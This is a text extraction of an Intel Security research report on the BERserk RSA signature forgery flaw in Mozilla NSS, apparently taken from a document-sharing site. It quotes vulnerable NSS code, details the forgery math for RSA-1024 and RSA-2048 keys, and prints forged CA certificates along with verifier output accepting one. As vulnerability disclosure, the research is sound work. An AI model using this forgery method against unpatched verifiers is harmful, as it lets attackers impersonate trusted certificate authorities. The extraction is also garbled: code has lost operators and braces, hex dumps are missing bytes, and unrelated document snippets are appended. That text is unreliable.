BERserk Vulnerability
|
|
|
- Leonard Blair
- 9 years ago
- Views:
Transcription
1 Intel Security: Advanced Threat Research BERserk Vulnerability Part 2: Certificate Forgery in Mozilla NSS October 6, 2014 Contents DigestInfo ASN.1 Decoding Vulnerabilities in Mozilla NSS... 2 Forging RSA-1024 Certificates... 7 Forging RSA-2048 Certificates Additional Information Acknowledgements... 16
2 In the first part of this report we provided generic background information regarding implementation issues that may be present in implementations of RSA signature verification which attempt to use ASN.1 decoding of the DigestInfo element of a PKCS#1 v1.5 padded message. In this second part we will provide details about specific vulnerabilities identified in the Mozilla Network Security Services (NSS) library and explain how certificates can be forged using these vulnerabilities. For additional information about BERserk vulnerabilities please refer to Part 1: RSA signature forgery attack due to incorrect parsing of ASN.1 encoded DigestInfo in PKCS#1 v1.5. DigestInfo ASN.1 Decoding Vulnerabilities in Mozilla NSS The implementation of RSA signature verification in the NSS library has mitigations for the original Bleichenbacher attack on PKCS1 v1.5 padding with a low public exponent: SECStatus SEC_QuickDERDecodeItem(PLArenaPool* arena, void* dest, const SEC_ASN1Template* templateentry, const SECItem* src)... if (SECSuccess == rv) newsrc = *src; rv = DecodeItem(dest, templateentry, &newsrc, arena, PR_TRUE); if (SECSuccess == rv && newsrc.len) rv = SECFailure; PORT_SetError(SEC_ERROR_EXTRA_INPUT); return rv; The above check at line #10 validates that the size of the remaining buffer after the padding bytes (00 01 FF.. FF 00) holds only the DER-encoded DigestInfo that matches the template and does not have extra bytes. As a result, it guarantees that there is no garbage left after the message digest in the EM. A similar check is implemented in the DER sequence decoding routine:
3 static SECStatus DecodeSequence(void* dest, const SEC_ASN1Template* templateentry, SECItem* src, PLArenaPool* arena)... do sequenceentry = &sequencetemplate[seqindex++]; if ( (sequenceentry && sequenceentry->kind) && (sequenceentry->kind!= SEC_ASN1_SKIP_REST) ) rv = DecodeItem(dest, sequenceentry, &sequence, arena, PR_TRUE); while ( (SECSuccess == rv) && (sequenceentry->kind && sequenceentry->kind!= SEC_ASN1_SKIP_REST) ); /* we should have consumed all the bytes in the sequence by now unless the caller doesn't care about the rest of the sequence */ if (SECSuccess == rv && sequence.len && sequenceentry && sequenceentry->kind!= SEC_ASN1_SKIP_REST) /* it isn't 100% clear whether this is a bad DER or a bad template. The problem is that logically, they don't match - there is extra data in the DER that the template doesn't know about */ PORT_SetError(SEC_ERROR_BAD_DER); rv = SECFailure; return rv; The preceding check at line #19 validates that the DER sequence doesn't have extra bytes other than those specified by the template. As a result, it guarantees that there is no garbage inside the DigestInfo. PKCS#1 v1.5 defines DigestInfo as follows [RFC 2313]: The message digest MD and a message-digest algorithm identifier shall be combined into an ASN.1 value of type DigestInfo, described below, which shall be BER encoded to give an octet string D, the data. DigestInfo ::= SEQUENCE digestalgorithm DigestAlgorithmIdentifier, digest Digest DigestAlgorithmIdentifier ::= AlgorithmIdentifier Digest ::= OCTET STRING The RSA implementation in the NSS library attempted to decode DigestInfo according to a hardcoded DegestInfo template. const SEC_ASN1Template sgn_digestinfotemplate[] = SEC_ASN1_SEQUENCE,
4 ; 0, NULL, sizeof(sgndigestinfo), SEC_ASN1_INLINE, offsetof(sgndigestinfo,digestalgorithm), SECOID_AlgorithmIDTemplate, SEC_ASN1_OCTET_STRING, offsetof(sgndigestinfo,digest), 0 DigestInfo is a DER SEQUENCE with AlgorithmID and a digest represented as DER OCTET_STRING. AlgorithID is defined with another template: const SEC_ASN1Template SECOID_AlgorithmIDTemplate[] = SEC_ASN1_SEQUENCE, 0, NULL, sizeof(secalgorithmid), SEC_ASN1_OBJECT_ID, offsetof(secalgorithmid,algorithm),, SEC_ASN1_OPTIONAL SEC_ASN1_ANY, offsetof(secalgorithmid,parameters),, 0, ; The NSS library decodes the message digest according to the templates and checks that there are no extra bytes left after decoding. The following is a vulnerable implementation of the definite_length_decoder routine, which decodes a BER-encoded length:
5 static unsigned char* definite_length_decoder(const unsigned char *buf, const unsigned int length, unsigned int *data_length, PRBool includetag) unsigned char tag; unsigned int used_length= 0; unsigned int data_len; if (used_length >= length) return NULL; tag = buf[used_length++]; /* blow out when we come to the end */ if (tag == 0) return NULL; if (used_length >= length) return NULL; data_len = buf[used_length++]; if (data_len&0x80) int len_count = data_len & 0x7f; data_len = 0; while (len_count-- > 0) if (used_length >= length) return NULL; data_len = (data_len << 8) buf[used_length++]; if (data_len > (length-used_length) ) return NULL; if (includetag) data_len += used_length; *data_length = data_len; return ((unsigned char*)buf + (includetag? 0 : used_length)); The preceding code can consume as much as 127 bytes of length [line #26], while only the last four octets (or more precisely sizeof(unsigned int) octets) will be used [line #34]. This flaw can be used to hide garbage from the NSS DER parser by putting it into the length field. There is another problem with the Mozilla NSS implementation of PKCS #1 RSA. PKCS #1 requires at least 8 padding bytes (0xFF) yet RSA_CheckSignRecover doesn't verify that there are at least 8 bytes of PS.
6 SECStatus RSA_CheckSignRecover(RSAPublicKey * key, unsigned char * output, unsigned int * outputlen, unsigned int maxoutputlen, const unsigned char * sig, unsigned int siglen)... /* * check the padding that was used */ if (buffer[0]!= RSA_BLOCK_FIRST_OCTET buffer[1]!= (unsigned char)rsa_blockprivate) goto loser; for (i = 2; i < moduluslen; i++) if (buffer[i] == RSA_BLOCK_AFTER_PAD_OCTET) *outputlen = moduluslen - i - 1; break; if (buffer[i]!= RSA_BLOCK_PRIVATE_PAD_OCTET) goto loser; if (*outputlen == 0) goto loser; if (*outputlen > maxoutputlen) goto loser; PORT_Memcpy(output, buffer + moduluslen - *outputlen, *outputlen); PORT_Free(buffer); return SECSuccess;... The following is an example of padded message EM' decrypted from a forged signature that contains chunks of garbage in place of multibyte lengths in the DigestInfo ASN.1-encoded sequence. Garbage bytes are denoted as "..", which can be replaced with any byte FF D a c B 0E A A2 EF e0 69 4E F8 83 2E 0D C0 42 0F E1 A1 6C The above padded message (EM') has the following structure: EM' starts with PKCS#1 v1.5 bytes of padding 0x00 0x01 followed by one byte 0xFF of the padding (due to the fact that the length of the padding is not verified) Padding bytes are followed by separator byte 0x00
7 The 0x00 separator byte is followed by an ASN.1-encoded DigestInfo sequence tag (0x30) Byte 0xD9 is the multibyte length that is being replaced by the first chunk of garbage. Multibyte length byte 0xD9 = 0x80 0x59 with bit 7 set has a length of 0x59 bytes long The chunk of garbage starts after byte 0xD9 and is 0x55 bytes long This chunk of garbage is followed by 4 last bytes of the length that will be decoded into length value 0x21. This is the length of the DigestInfo. The last 20 bytes in EM' is the SHA1 message digest of the fake certificate The goal of the exploit is to create such forged signature (s') without knowing the private key that results in the preceding padded message EM' after cubing. For the key length of 1024 bytes only one forged length can be used. Because the padding length is not checked, it's possible to fit a forged signature in 1024 bytes. In this example only 1 byte of padding is used. Forging RSA-1024 Certificates In order to implement the signature-forging attack an adversary has to generate a signature s' such that it will pass verification by the implementation which has the padding check vulnerabilities already described. The signature s' when decrypted using the public exponent should give the padded message EM' in the format described in the previous section. EM' has two fixed-byte sequences: 1. The fixed prefix FF D9 up until multibyte length is the section under attack. The prefix is constant and can be calculated beforehand for each message signature being forged. 2. The fixed suffix contains the remaining DigestInfo followed by 20 bytes of SHA1 message digest. The suffix in this case contains the SHA1 digest of the message being forged, thus this part of the calculation has to be done for each message. In order to forge the prefix and suffix in EM' we will use the same algorithms described in the first part of the analysis. The following example illustrates the attack. We will create a certificate and forge its signature with the root certificate that has a 1024-bit modulus and public exponent of 3. The following root CA certificate was used: Digital Signature Trust Co. DSTCA E1 Digital Signature Trust Co. Global CA Dec Dec 10
8 The message SHA1 hash is: 0000 A2 EF E F8 83 2E 0D C0 42 0F E A1 6C The result of executing the forge_prefix algorithm on our test message is the upper part of the forged signature s', which after cubing gives the proper prefix of EM': F FF0030D The result of executing the forge_suffix algorithm on our test message is the lower part of the forged signature s', which after cubing gives the proper suffix of EM': B138F1B4A450A796BAF2398CCDAF8E0286A9BDA5B337BF4A E91E06529C5B0F B0E03021A A2EF E5342F8 832E0DC0420FE1A16C0027 The resulting signature is the sum of sighi and siglo: F33801B138F1B4A450A796BAF2398CCDAF8E0286A9BDA5B337BF4A E91E06529C5B0F a F B 13 8F 1B 4A 00c0 45 0A 79 6B AF CC DA F8 E0 28 6A 9B DA 5B 00e0 33 7B F4 A E 91 E C5 B0 F7 When decrypted with RSA public key exponent 3, that is, after cubing modulo RSA modulus, we have the following padded message EM':
9 FF D9 47 A AE 12 CE E DE A B7 B C8 7A 03 B1 E1 42 FD E E2 CF EF 5B B8 96 4D 4D B ED 9B C8 B9 0E B F5 42 E9 19 0F 0080 AA 2C 51 F CC 89 0D 7C D9 00 C5 2A 90 AE 00a0 2D 78 A0 69 D7 2D 7B 5D B c B 0E A A2 EF e0 69 4E F8 83 2E 0D C0 42 0F E1 A1 6C As we can see this conforms to the format of the padded message EM accepted by the vulnerable implementation. We can then craft a forged Example Forged CA digital certificate and sign it with the forged signature of a certification authority that uses RSA public keys with exponent 3 as follows: -----BEGIN CERTIFICATE----- MIIC7DCCAlWgAwIBAgIBBzANBgkqhkiG9w0BAQUFADBGMQswCQYDVQQGEwJVUzEk MCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMREwDwYDVQQLEwhE U1RDQSBFMTAeFw0xNDA5MjMyMjU2MzBaFw0yNDA5MjIyMjU2MzBaMEkxEzARBgNV BAoMCkV4YW1wbGUgQ0ExGDAWBgNVBAsMD0V4YW1wbGUgRmFrZSBDQTEYMBYGA1UE AwwPRXhhbXBsZSBGYWtlIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC AQEA+46KJixUliSqdGjIL2jq0W6M9ErFP1Ajsx5H/wf0BkBKhetzhLXr7H6+vjaP y2ytpq4ifvckzdjww9fy7v+ymhazknkkki54mqpfy6mn2hqhwfxw0ivqfsn9agh/ uuk+tcxqpyylxamitdpaqelobp6l9tsdluezs+acv2owfoglcso080q50i4hyckz wj6az8qkdugh2nkvupawgkqkkml6o5lcqa8f4zfcodbgq37pd3ealmaajtbncnsc EeyZNg1VwnkM603H8TB8Kp1EAGnTuJAQu4BpPluXv+qHVIBCi3SQgvwopXt87eJc YWF2bdVSSeVO2UNLtTs7HsMq6wIDAQABo2MwYTAOBgNVHQ8BAf8EBAMCAQYwDwYD VR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUDzovMqcIym2YOGpLMRPU/7uFPO4wHwYD VR0jBBgwFoAUanl+kWlGGBMKAnelWVtgmCUOovgwDQYJKoZIhvcNAQEFBQADgYEA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFCVG8zgACe/iH7 uo6ro+fllorhwrtnvdfd5090xgrs8u+gdesdszrblu8= -----END CERTIFICATE----- The checkcert utility from Mozilla NSS source code can be used to verify the validity of this certificate with a forged signature. >checkcert -a test.crt -A root.crt Certificate: Data: Version: 3 (0x2) Serial Number: 7 (0x7) Signature Algorithm: PKCS #1 SHA-1 With RSA Encryption Issuer: "OU=DSTCA E1,O=Digital Signature Trust Co.,C=US" Validity: Not Before: Tue Sep 23 22:56: Not After : Sun Sep 22 22:56: Subject: "CN=Example Fake CA,OU=Example Fake CA,O=Example CA" Subject Public Key Info: Public Key Algorithm: PKCS #1 RSA Encryption RSA Public Key: Modulus: fb:8e:8a:26:2c:54:96:24:aa:74:68:c8:2f:68:ea:d1: 6e:8c:f4:4a:c5:3f:50:23:b3:1e:47:ff:07:f4:06:40:
10 4a:85:eb:73:84:b5:eb:ec:7e:be:be:36:8f:cb:66:2d: 3e:ae:08:7d:50:8a:cd:d2:56:c3:d7:f2:ed:5f:98:9a: 10:19:28:d2:a4:2a:2e:78:31:03:df:63:a9:a7:da:1a: a1:59:f5:f0:d0:8b:ea:16:c9:fd:6a:01:ff:b9:49:3e: b5:cc:50:a5:86:0b:5d:a3:08:b5:da:40:40:42:e8:04: fe:8b:f5:3b:03:95:47:99:4b:e6:82:bf:63:b0:16:81: a5:71:23:b4:f3:44:39:d2:2e:21:c9:c9:33:c2:3e:80: 67:ca:8a:0e:e1:87:da:72:95:52:96:b0:1a:44:0a:2a: 69:7a:3b:92:dc:41:af:05:e3:31:42:a1:d0:60:ab:7e: e9:77:77:9a:2c:c0:00:8e:d6:e7:08:d4:9c:11:ec:99: 36:0d:55:c2:79:0c:eb:4d:c7:f1:30:7c:2a:9d:44:00: 69:d3:b8:90:10:bb:80:69:3e:5b:97:bf:ea:87:54:80: 42:8b:74:90:82:fc:28:a5:7b:7c:ed:e2:5c:61:61:76: 6d:d5:52:49:e5:4e:d9:43:4b:b5:3b:3b:1e:c3:2a:eb Exponent: (0x10001) Signed Extensions: Name: Certificate Key Usage Critical: True Usages: Certificate Signing CRL Signing Name: Certificate Basic Constraints Critical: True Data: Is a CA with no maximum path length. Name: Certificate Subject Key ID Data: 0f:3a:2f:32:a7:08:ca:6d:98:38:6a:4b:31:13:d4:ff: bb:85:3c:ee Name: Certificate Authority Key Identifier Key ID: 6a:79:7e:91:69:46:18:13:0a:02:77:a5:59:5b:60:98: 25:0e:a2:f8 Signature Algorithm: PKCS #1 SHA-1 With RSA Encryption Signature: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:01:42:54:6f:33:80:00:9e:fe:21:fb: b8:ee:91:3b:e7:cb:96:84:61:59:14:cd:55:d1:5d:e7: 4f:74:c6:04:52:f2:ef:86:0d:eb:1d:4b:34:5b:96:ef Fingerprint (SHA-256): 9B:DF:F6:75:6D:1B:EC:B5:A3:75:9E:D4:E3:05:94:03:D0:9D:59:94:F0:96:95:4E:0F:D8 :5E:25:F9:DF:57:9D Fingerprint (SHA1): DF:97:5C:3F:C7:FC:16:9A:1F:66:03:1C:3E:80:C6:A0:B8:3E:FC:E9 WARNING: Signature not PKCS1 MD5 with RSA Encryption INFO: Public Key modulus length in bits: 2048 PROBLEM: Modulus length exceeds 1024 bits. PROBLEM: Issuer Name lacks Common Name (CN) PROBLEM: Subject Name lacks Country Name (C) INFO: Certificate is NOT self-signed. INFO: Inside validity period of certificate. INFO: Issuer's signature verifies ok. Forging RSA-2048 Certificates
11 We will use the following example to illustrate the attack. Signatures for the keys with public-key modulus larger than 1024 bits can also be forged. In this case a second ASN.1 long length with garbage may be used. Below is a correct example of SHA-1 DigestInfo: b 0e a XXXXXXXXXXX Tag Length 30 (SEQUENCE) 21 Tag Length 30 (SEQUENCE) 09 Tag Length 06 (OID) 05 OID 2b 0e a Tag Length 05 (NULL) 00 Tag Length 04 (OCTET STRING) 14 octet string (the SHA1 hash) XXXXXXXXXXX And a forged DigestInfo encoding to hide garbage: 30 db.. garbage a0 30 ff.. garbage b 0e a XXXXXXXXXXX Tag Length (long form) 30 (SEQUENCE) db (80 5b).. garbage a0 Tag Length (long form) 30 (SEQUENCE) ff (80 7f).. garbage Tag Length 06 (OID) 05 OID 2b 0e a Tag Length 05 (NULL) 00 Tag Length 04 (OCTET STRING) 14 octet string (the SHA1 hash) XXXXXXXXXXX The forged signature after cubing should give the correct padding plus the first sequence tag and the first byte of the length, with six bytes in the middle and the rest of the DigestInfo and SHA-1 hash in the end. It will look like this: DB.. garbage A030FF.. garbage B0E03021A C03741AFCA732172F45829A0FD8D14B480CA4C1 Note that there are no FF padding bytes in the beginning. They are not required by the implementation. The length of the topmost DER SEQUENCE was also changed; it's 0A now, in order to include the length of the garbage.
12 The algorithm to forge a signature should be modified accordingly: 1. The fixed PKCS1v1.5 prefix (no FF padding) and 2 bytes from the new DigestInfo, the sequence tag, and the number of octets in the long length: 30 DB 2. The fixed suffix is 20 bytes of the message digest (for SHA-1) and the greatest part of the DigestInfo: The last 4 bytes of the long length: AlgorithmID and its parameter The hash 3. Middle part: The last 4 bytes of the long length: A0 The sequence tag for the AlgorithmID: 30 The byte count for the second long length: FF The beginning and the end of the signature are calculated as in the preceding description. To produce the 6 bytes in the middle, let's represent the signature as follows: where m is the required value to produce 6 bytes in the middle. The forged padded message ( ) can then be represented as a cube of the sum of all three parts of the forged signature s : ( ) Where h and l are sighi and siglo, respectively. The calculated sighi and siglo cannot be modified, so m should have zero low octets up to the length of siglo, and the most significant octet of m should be below the least significant non-zero octet of sighi. Another restriction is where we may place these middle 6 bytes. The number of octets in long length cannot be more than 127, so the middle part should fall in the following range (valid range): [ ] Where the Where the is DB is B0E03021A MessageDigest The attack will be performed on RSA with SHA-1 with a key length of 2048 bits. Let's take a look at the value of the cube of, using different values for m. The valid range for m is highlighted in each term of the of the cube of
13 FF DB4A EF454EE2431A72B A02B29379B184250A610056D C E42956ED1E 32AD0EEDCBCE0A74443AF5E8123A E0A0BB4A98C2160F4D3E37BAB8E49344B A27A50A330EA7145E92C95FE4012D B0351EB317CFAE66B0E5B1E72104BFB925DAD68 6ECEF5151AD3D5E805EC3BDC998F5C6CCE97E2A3D6E938AD39B812FD FAE7895A7111C 62ED2AFE8046B680C14D52484DD51FBF6D612BD24ED48CB544685F B0E0302 1A C03741AFCA732172F45829A0FD8D14B480CA4C FBDC6D8DA511B430AA754A9AAF E990D908427DBBB EF9EC583 9EFD4CA3E8FEEB9746F665AB2BCD45664AF84197F642B7F4B3B D30FB9C F182BB9BC33B2A8C2B4AEB8C26422A39A04EA2EBC5A53271D084F921E28131B312CF8D2416D1 9A35B01156BAEBB40E4040F3F15B4EF4B8B98CE0F31DB78F2697D A0517B04A0516EA F352B30B1D6883 1A6D3AA3D6A2D0D1C DC6FA968F3DB293C0E2A3D137EEC FD02FF DB4A EF454EE2431A72B FBDC779057A52DE22E9A54FBAFAC C E42956ED1E 32AD0EEDCBCE0A74443AF5E8123A AF2E3B6FC070F9F150D04CA458A7DFFAA8 E924F1AE1C0D92ABA5892F0B0FCE7298CC1C8B482B616B0C BAEB30471BE57409E4E A8545B72ADAA596290E70F9EB191460AFF2C0A E7827F85152A53A7B202C14822CB27ED FD22DB0FD701A234CF8D933C3F306EB4261AB8B341F244446B002F B0E0302 1A C03741AFCA732172F45829A0FD8D14B480CA4C1
14 If we place the middle part in the beginning of the valid range, the first 3 bytes can be found as a part of, and the last 3 bytes as a part of. This way m is split in two parts, m_hi and m_low. The m_low part is calculated as a square root of V, in which The m_hi part is calculated by doing an exhaustive search, and adding more bytes to sighi D D0AE8E F4F A29EBDB306 7E5F212ABFF010C999CBAB522DA0BCB588C5E93DD2B31F7C D660D0AE8E F4F A29EBDB306 7E5F212ABFF010C999CBAB522DA0BCB588C5E93DD2B31F7C DB A030FF B0E0302 1A C03741AFCA732172F45829A0FD8D14B480CA4C1
15 DB4A EF454EE2431A72B F278C9885FD01CA DE C E42956ED1E 32AD0EEDCBCE0A74443AF5E8123A A030FF3B8C0DC54EE C4B357D467FCD68 517EA337E6FC70F BB6CD5E41F24048F238132B3C681AAF6375A EFB62EF7124 B2FE365B497EA84C8E4AA137CA3B39DB693D0CCDDD2E9ACD6EF240D3E751BD77D8BC5F2C D7EC85F7B5DB7F8A48AF2EE6ED49F1B89E264C3D928C3E387D974E B0E0302 1A C03741AFCA732172F45829A0FD8D14B480CA4C1 The CA certificate with a forged signature follows: -----BEGIN CERTIFICATE----- MIIEBTCCAu2gAwIBAgIBBzANBgkqhkiG9w0BAQUFADBoMQswCQYDVQQGEwJVUzEl MCMGA1UEChMcU3RhcmZpZWxkIFRlY2hub2xvZ2llcywgSW5jLjEyMDAGA1UECxMp U3RhcmZpZWxkIENsYXNzIDIgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTQw OTIzMjI1NjMwWhcNMjQwOTIyMjI1NjMwWjBJMRMwEQYDVQQKDApFeGFtcGxlIENB MRgwFgYDVQQLDA9FeGFtcGxlIEZha2UgQ0ExGDAWBgNVBAMMD0V4YW1wbGUgRmFr ZSBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAPuOiiYsVJYkqnRo yc9o6tfujprkxt9qi7mer/8h9azasoxrc4s16+x+vr42j8tmlt6uch1qis3svspx 8u1fmJoQGSjSpCoueDED32Opp9oaoVn18NCL6hbJ/WoB/7lJPrXMUKWGC12jCLXa QEBC6AT+i/U7A5VHmUvmgr9jsBaBpXEjtPNEOdIuIcnJM8I+gGfKig7hh9pylVKW sbpecippejus3egvbemxqqhqykt+6xd3mizaai7w5wjunbhsmtynvcj5dotnx/ew fcqdrabp07iqeluaat5bl7/qh1saqot0kil8kkv7fo3ixgfhdm3vuknlttlds7u7 Ox7DKusCAwEAAaOB2DCB1TAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB /zadbgnvhq4efgqudzovmqciym2yogplmrpu/7ufpo4wgziga1udiwsbijcbh4au v1+30c7dh4b0w1ws3ncqwg6pioehbkrqmggxczajbgnvbaytalvtmsuwiwydvqqk ExxTdGFyZmllbGQgVGVjaG5vbG9naWVzLCBJbmMuMTIwMAYDVQQLEylTdGFyZmll bgqgq2xhc3mgmibdzxj0awzpy2f0aw9uief1dghvcml0eyibadanbgkqhkig9w0b AQUFAAOCAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKFPWYMsXPsAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAELOr+rPbEgjUksl0Bh ljtwqja/vhn2go6aeurp4rdhzrxit69bdw== -----END CERTIFICATE----- There are CAs that issue root certificates with a 2048-bit RSA public key and a public exponent 3. By forging the signature with this CA public key, attackers can build their own certificate chains trusted by Mozilla NSS. The following is a screenshot of such a certificate chain with a forged certificate from the current example:
16 Additional Information Hal Finney: Bleichenbacher's RSA signature forgery based on implementation error OpenSSL RSA Signature Forgery (CVE ) Ulrich Kühn, Andrei Pyshkin, Erik Tews, Ralf-Philipp Weinmann: Variants of Bleichenbacher s Low-Exponent Attack on PKCS#1 RSA Signatures Yutaka Oiwa, Kazukuni Kobara, Hajime Watanabe: A New Variant for an Attack Against RSA Signature Verification Using Parameter Field CERT Vulnerability Note VU# (Mozilla Network Security Services (NSS) fails to properly verify RSA signatures) Mozilla Foundation: RSA Signature Forgery in NSS Mozilla Foundation: Security Advisory Google Chrome Stable Channel Update [414124] RSA signature malleability in NSS (CVE ) Adam Langley: PKCS#1 Signature Validation (26 Sep 2014) Acknowledgements The issue in the Mozilla NSS library was independently discovered and reported by Antoine Delignat-Lavaud (INRIA Paris, PROSECCO) and by the Advanced Threat Research team at Intel Security.
Package PKI. February 20, 2013
Package PKI February 20, 2013 Version 0.1-1 Title Public Key Infrastucture for R based on the X.509 standard Author Maintainer Depends R (>=
Package PKI. July 28, 2015
Version 0.1-3 Package PKI July 28, 2015 Title Public Key Infrastucture for R Based on the X.509 Standard Author Maintainer Depends R (>= 2.9.0),
The Forger s Art Exploiting XML Digital Signature Implementations HITB 2013
The Forger s Art Exploiting XML Digital Signature Implementations HITB 2013 James Forshaw (@tiraniddo) Research. Response. Assurance. @CTXIS What am I going to talk about? XML Digital Signature Implementations
Bugzilla ID: Bugzilla Summary:
Bugzilla ID: Bugzilla Summary: CAs wishing to have their certificates included in Mozilla products must 1) Comply with the requirements of the Mozilla CA certificate policy (http://www.mozilla.org/projects/security/certs/policy/)
MarshallSoft AES. (Advanced Encryption Standard) Reference Manual
MarshallSoft AES (Advanced Encryption Standard) Reference Manual (AES_REF) Version 3.0 May 6, 2015 This software is provided as-is. There are no warranties, expressed or implied. Copyright (C) 2015 All
Interoperability Guidelines for Digital Signature Certificates issued under Information Technology Act
for Digital Signature Certificates issued under Information Technology Act Version 2.4 December 2009 Controller of Certifying Authorities Department of Information Technology Ministry of Communications
Security Issues of the Digital Certificates within Public Key Infrastructures
16 Security Issues of the Digital Certificates within Public Key Infrastructures Cristian TOMA Economic Informatics Department, Academy of Economic Studies, Bucharest, Romania [email protected] The
Verify Needed Root Certificates Exist in Java Trust Store for Datawire JavaAPI
Verify Needed Root Certificates Exist in Java Trust Store for Datawire JavaAPI Purpose This document illustrates the steps to check and import (if necessary) the needed root CA certificates in JDK s trust
Asymmetric cryptosystems fundamental problem: authentication of public keys
Network security Part 2: protocols and systems (a) Authentication of public keys Università degli Studi di Brescia Dipartimento di Ingegneria dell Informazione 2014/2015 Asymmetric cryptosystems fundamental
Network Security. Gaurav Naik Gus Anderson. College of Engineering. Drexel University, Philadelphia, PA. Drexel University. College of Engineering
Network Security Gaurav Naik Gus Anderson, Philadelphia, PA Lectures on Network Security Feb 12 (Today!): Public Key Crypto, Hash Functions, Digital Signatures, and the Public Key Infrastructure Feb 14:
Digital Signatures in a PDF
This document describes how digital signatures are represented in a PDF document and what signature-related features the PDF language supports. Adobe Reader and Acrobat have implemented all of PDF s features
TechNote 0006: Digital Signatures in PDF/A-1
TechNote 0006: Digital Signatures in PDF/A-1 Digital signatures are primarily used to check the integrity of the signed part of the document. They also can be used to authenticate the signer s identity
Authentication Applications
Authentication Applications will consider authentication functions developed to support application-level authentication & digital signatures will consider Kerberos a private-key authentication service
Secure Sockets Layer (SSL ) / Transport Layer Security (TLS) Network Security Products S31213
Secure Sockets Layer (SSL ) / Transport Layer Security (TLS) Network Security Products S31213 UNCLASSIFIED Example http ://www. greatstuf f. com Wants credit card number ^ Look at lock on browser Use https
Biometrics, Tokens, & Public Key Certificates
Biometrics, Tokens, & Public Key Certificates The Merging of Technologies TOKENEER Workstations WS CA WS WS Certificate Authority (CA) L. Reinert S. Luther Information Systems Security Organization Biometrics,
SECURITY IN ELECTRONIC COMMERCE MULTIPLE-CHOICE QUESTIONS
MULTIPLE-CHOICE QUESTIONS Each question has only one correct answer, which ought to be clearly pointed out with an 'X'. Each question incorrectly answered will be evaluated as minus one third of the mark
CALIFORNIA SOFTWARE LABS
; Digital Signatures and PKCS#11 Smart Cards Concepts, Issues and some Programming Details CALIFORNIA SOFTWARE LABS R E A L I Z E Y O U R I D E A S California Software Labs 6800 Koll Center Parkway, Suite
Functional Specification of the OpenPGP application on ISO Smart Card Operating Systems
Functional Specification of the OpenPGP application on ISO Smart Card Operating Systems Version 2.0.1 Author: Achim Pietig 2009 April 22 Author: Achim Pietig Lippstädter Weg 14 32756 Detmold Germany Email:
Grid Computing - X.509
Grid Computing - X.509 Sylva Girtelschmid October 20, 2009 Public Key Infrastructure - PKI PKI Digital Certificates IT infrastructure that provides means for private and secure data exchange By using cryptographic
GNUTLS. a Transport Layer Security Library This is a Draft document Applies to GnuTLS 1.0.13. by Nikos Mavroyanopoulos
GNUTLS a Transport Layer Security Library This is a Draft document Applies to GnuTLS 1.0.13 by Nikos Mavroyanopoulos ii Copyright c 2001,2002,2003 Nikos Mavroyanopoulos Permission is granted to copy, distribute
[SMO-SFO-ICO-PE-046-GU-
Presentation This module contains all the SSL definitions. See also the SSL Security Guidance Introduction The package SSL is a static library which implements an API to use the dynamic SSL library. It
Apple Certificate Library Functional Specification
Apple Certificate Library Functional Specification apple 2005-01-13 apple Apple Computer, Inc. 2005 Apple Computer, Inc. All rights reserved. No part of this publication may be reproduced, stored in a
Security. Learning Objectives. This module will help you...
Security 5-1 Learning Objectives This module will help you... Understand the security infrastructure supported by JXTA Understand JXTA's use of TLS for end-to-end security 5-2 Highlights Desired security
The Direct Project. Implementation Guide for Direct Project Trust Bundle Distribution. Version 1.0 14 March 2013
The Direct Project Implementation Guide for Direct Project Trust Bundle Distribution Version 1.0 14 March 2013 Version 1.0, 14 March 2013 Page 1 of 14 Contents Change Control... 3 Status of this Guide...
Waspmote Encryption Libraries. Programming guide
Waspmote Encryption Libraries Programming guide Index Document version: v4.3-01/2015 Libelium Comunicaciones Distribuidas S.L. INDEX 1. General Concepts... 4 2. Integrity... 7 2.1. Waspmote Libraries...7
Implementation and Comparison of Various Digital Signature Algorithms. -Nazia Sarang Boise State University
Implementation and Comparison of Various Digital Signature Algorithms -Nazia Sarang Boise State University What is a Digital Signature? A digital signature is used as a tool to authenticate the information
All your private keys are belong to us
All your private keys are belong to us 1 All your private keys are belong to us Extracting RSA private keys and certificates from process memory Tobias Klein [email protected] Version 1.0, 2006/02/05. All
SBClient SSL. Ehab AbuShmais
SBClient SSL Ehab AbuShmais Agenda SSL Background U2 SSL Support SBClient SSL 2 What Is SSL SSL (Secure Sockets Layer) Provides a secured channel between two communication endpoints Addresses all three
SECURITY IN ELECTRONIC COMMERCE - SOLUTION MULTIPLE-CHOICE QUESTIONS
MULTIPLE-CHOICE QUESTIONS Each question has only one correct answer, which ought to be clearly pointed out with an 'X'. Each question incorrectly answered will be evaluated as minus one third of the mark
SEC 4: Elliptic Curve Qu-Vanstone Implicit Certificate Scheme (ECQV)
Standards for Efficient Cryptography SEC 4: Elliptic Curve Qu-Vanstone Implicit Certificate Scheme (ECQV) Contact: Certicom Research Eoin Buckley ([email protected]) April 3, 2014 Version (Draft)
Cryptography and Network Security Chapter 14
Cryptography and Network Security Chapter 14 Fifth Edition by William Stallings Lecture slides by Lawrie Brown Chapter 14 Key Management and Distribution No Singhalese, whether man or woman, would venture
Online signature API. Terms used in this document. The API in brief. Version 0.20, 2015-04-08
